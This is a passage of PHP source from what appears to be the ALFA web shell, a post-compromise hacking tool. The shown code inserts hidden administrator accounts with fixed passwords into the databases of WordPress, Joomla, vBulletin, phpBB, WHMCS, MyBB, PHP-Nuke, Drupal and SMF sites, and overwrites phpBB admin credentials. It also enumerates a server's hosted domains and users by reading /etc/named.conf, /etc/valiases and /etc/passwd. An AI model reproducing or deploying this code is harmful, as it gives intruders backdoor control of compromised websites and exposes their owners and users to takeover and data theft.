$_POST[\'alfa6\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,\'$admin\',\'d4a590caacc0be55ef286e40a945ea45\',\'$SQL\')") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login=\'".$admin."\'") or die(mysqli_error($conn));\r\n$sole = @mysqli_num_rows($solevisible);\r\nif ($sole == 1){\r\n$solevis = @mysqli_fetch_assoc($solevisible);\r\n$res = $solevis[\'ID\'];\r\n}\r\n$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,\'".$res."\',\'first_name\',\'solevisible\'),(null,\'".$res."\',\'last_name\',\'solevisible\'),(null,\'".$res."\',\'nickname\',\'solevisible\'),(null,\'".$res."\',\'description\',\'solevisible\'),(null,\'".$res."\',\'rich_editing\',\'true\'),(null,\'".$res."\',\'comment_shortcuts\',\'false\'),(null,\'".$res."\',\'admin_color\',\'fresh\'),(null,\'".$res."\',\'use_ssl\',\'0\'),(null,\'".$res."\',\'show_admin_bar_front\',\'true\'),(null,\'".$res."\',\'".$prefix."capabilities\',\'a:1:{s:13:\\"administrator\\";b:1;}\'),(null,\'".$res."\',\'".$prefix."user_level\',\'10\'),(null,\'".$res."\',\'show_welcome_panel\',\'1\'),(null,\'".$res."\',\'".$prefix."dashboard_quick_press_last_post_id\',\'3\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif($_POST[\'alfa2\'] && $_POST[\'alfa2\'] == \'joomla\'){\r\n\r\necho __pre().\'<center><center><div class="txtfont_header">| Joomla |</div><p><p>\'.getConfigHtml(\'joomla\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',\\\'joomla\\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'jos_\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa3\'];\r\n$database = $_POST[\'alfa4\'];\r\n$username = $_POST[\'alfa5\'];\r\n$password = $_POST[\'alfa6\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,\'Super User\',\'".$admin."\',\'".$SQL."\',\'d4a590caacc0be55ef286e40a945ea45\')") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username=\'".$admin."\'") or die(mysqli_error($conn));\r\n$sole =@mysqli_num_rows($solevisible);\r\nif ($sole == 1){\r\n$solevis =@mysqli_fetch_assoc($solevisible);\r\n$res = $solevis[\'id\'];\r\n}\r\n$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES (\'".$res."\', \'8\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif($_POST[\'alfa4\'] && $_POST[\'alfa4\'] == \'vb\'){\r\n\r\necho __pre().\'<center><center><div class="txtfont_header">| vBulletin |<div><p>\'.getConfigHtml(\'vb\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,\\\'vb\\\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'hi\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa5\'];\r\n$password = $_POST[\'alfa6\'];\r\n$prefix = $_POST[\'alfa7\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_connect_error());\r\n$pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = \'{$prefix}user\' and column_name = \'password\' and table_schema = \'{$database}\'");\r\n$pw_col = @mysqli_num_rows($pw_col);\r\n$adm_perm = "16744444";\r\nif($pw_col > 0){\r\n$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,\'6\',\'$admin\',\'52e28b78f55641cd4618ad1a20f5fd5c\',\'Xw|IbGLhTQA-AwApVv>61y^(z]*<QN\',\'$SQL\',\'".date(\'Y-m-d\')."\',\'".time()."\')") or die(mysqli_error($conn));\r\n}else{\r\n$adm_perm = "2143256444";\r\n$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,token,secret,email,passworddate,joindate,scheme,birthday_search) values(null,\'6\',\'$admin\',\'\\$2y\\$10\\$YsVhV.9tLnzBYxar1BJAGO3vFz68/qDU7Jt62SDdLy6lUT9N5Z/wq\',\'Qf~ADeA}iAey-&#ALQF<}/uBDqSnw>\',\'$SQL\',\'".date(\'Y-m-d\')."\',\'".time()."\',\'blowfish:10\',\'1984-05-20\')") or die(mysqli_error($conn));\r\n}\r\n$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username=\'".$admin."\'") or die(mysqli_error($conn));\r\n$sole = mysqli_num_rows($solevisible);\r\nif($sole == 1){\r\n$solevis = mysqli_fetch_assoc($solevisible);\r\n$res = $solevis[\'userid\'];\r\n}\r\n$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values(\'".$res."\',\'".$adm_perm."\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif(isset($_POST[\'alfa5\']) && $_POST[\'alfa5\'] == \'phpbb\'){\r\n\r\necho __pre().\'<center><div class="txtfont_header">| phpBB |</div><p><p>\'.getConfigHtml(\'phpbb\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,this.username.value,\\\'phpbb\\\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa4\'];\r\n$password = $_POST[\'alfa6\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$hash = md5(\'solevisible\');\r\n$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean =\'".$admin."\' WHERE username_clean = \'admin\'") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password =\'".$hash."\' WHERE username_clean = \'admin\'") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean =\'".$admin."\' WHERE user_type = 3") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password =\'".$hash."\' WHERE user_type = 3") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email =\'".$SQL."\' WHERE username_clean = \'admin\'") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');\r\n}\r\n}\r\n}\r\nif(isset($_POST[\'alfa6\']) && $_POST[\'alfa6\'] == \'whmcs\'){\r\n\r\necho __pre().\'<center><div class="txtfont_header">| Whmcs |</div><p><p>\'.getConfigHtml(\'whmcs\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,this.username.value,this.password.value,\\\'whmcs\\\',null,this.admin.value,this.email.value); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa4\'];\r\n$password = $_POST[\'alfa5\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,\'1\',\'".$admin."\',\'d4a590caacc0be55ef286e40a945ea45\',\'".$SQL."\',\'blend\',\'getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif(isset($_POST[\'alfa7\']) && $_POST[\'alfa7\'] == \'mybb\'){\r\n\r\necho __pre().\'<center><div class="txtfont_header">| Mybb |</div><p><p>\'.getConfigHtml(\'mybb\').\'</p><form onsubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\\\'mybb\\\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa4\'];\r\n$password = $_POST[\'alfa5\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,\'".$admin."\',\'e71f2c3265619038d826a1ac6e2b9b8e\',\'ywza68lS\',\'".$SQL."\',\'4\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif(isset($_POST[\'alfa8\']) && $_POST[\'alfa8\'] == \'nuke\'){\r\n\r\necho __pre().\'<center><div class="txtfont_header">| PhpNuke |</div><p><p>\'.getConfigHtml(\'phpnuke\').\'</p><form onsubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\\\'nuke\\\',this.email.value,this.prefix.value); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa4\'];\r\n$password = $_POST[\'alfa5\'];\r\n$admin = $_POST[\'alfa7\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$hash = md5($pwd);\r\n$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values(\'$admin\',\'God\',\'$SQL\',\'d4a590caacc0be55ef286e40a945ea45\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif(isset($_POST[\'alfa9\']) && $_POST[\'alfa9\'] == \'drupal\'){\r\n\r\necho __pre().\'<center><div class="txtfont_header">| Drupal |</div><p><p>\'.getConfigHtml(\'drupal\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\\\'drupal\\\'); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true)\r\n );\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa4\'];\r\n$username = $_POST[\'alfa5\'];\r\n$password = $_POST[\'alfa6\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");\r\n$getDescuid = @mysqli_fetch_assoc($getDescuid);\r\n$getDescuid = $getDescuid[\'uid\'];\r\n$getdescuid = $getDescuid++;\r\n$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values(\'$getDescuid\',\'$admin\',\'\\$S\\$DP2y9AbolCBOd\\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC\',\'solevisible@fbi.gov\',\'filtered_html\',\'1\',\'Europe/Berlin\',\'solevisible@fbi.gov\')") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"select uid from users where name=\'".$admin."\'") or die(mysqli_error($conn));\r\n$sole = mysqli_num_rows($solevisible);\r\nif ($sole == 1){\r\n$solevis = mysqli_fetch_assoc($solevisible);\r\n$res = $solevis[\'uid\'];\r\n}\r\n$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES (\'".$res."\', \'3\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\n\r\nif(isset($_POST[\'alfa10\']) && $_POST[\'alfa10\'] == \'smf\'){\r\n\r\necho __pre().\'<center><center><div class="txtfont_header">| SMF |</div><p><p>\'.getConfigHtml(\'smf\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\\\'smf\\\'); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'smf_\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'hi\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n );\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa5\'];\r\n$password = $_POST[\'alfa6\'];\r\n$prefix = $_POST[\'alfa7\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$setpwAlg = sha1(strtolower($admin) . \'solevisible\');\r\n$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,\'$admin\',\'1\',\'$admin\',\'$setpwAlg\',\'solevisible@fbi.gov\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfaMakePwd(){\r\n\tif(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){\r\n\t\treturn "/home/{user}/public_html/";\r\n\t}\r\n\t$document = explode("/", $_SERVER["DOCUMENT_ROOT"]);\r\n\t$public = end($document);\r\n\tarray_pop($document);\r\n\tarray_pop($document);\r\n\t$path = implode("/", $document) . "/{user}/" . $public;\r\n\treturn $path;\r\n}\r\nfunction alfaGetDomains($state = false){\r\n\t$state = "named.conf";\r\n\t$lines = array();\r\n\t$lines = _alfa_file(\'/etc/named.conf\');\r\n\tif(!$lines){\r\n\t\t$lines = @scandir("/etc/valiases/");\r\n\t\t$state = "valiases";\r\n\t\tif(!$lines){\r\n\t\t\t$lines = @scandir("/var/named");\r\n\t\t\t$state = "named";\r\n\t\t\tif(!$lines && $state){\r\n\t\t\t\t$lines = _alfa_file(\'/etc/passwd\');\r\n\t\t\t\t$state = "passwd";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn array("lines" => $lines, "state" => $state);\r\n}\r\nfunction alfaCreateParentFolder(){\r\n\t$parent = $GLOBALS[\'home_cwd\'] . "/" . __ALFA_DATA_FOLDER__;\r\n\tif(!@is_dir($parent)){\r\n\t\t@mkdir($parent, 0755, 